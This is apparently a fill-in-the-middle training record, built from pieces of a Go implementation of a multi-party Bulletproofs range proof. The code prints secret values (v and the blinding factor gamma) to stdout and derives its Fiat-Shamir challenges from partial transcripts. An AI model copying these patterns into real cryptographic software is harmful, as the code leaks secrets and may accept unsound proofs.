for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
} | random_line_split | |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, cy, cz *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bit | tsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bitsPerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
}
| sPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bi | conditional_block |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, | *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bitsPerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
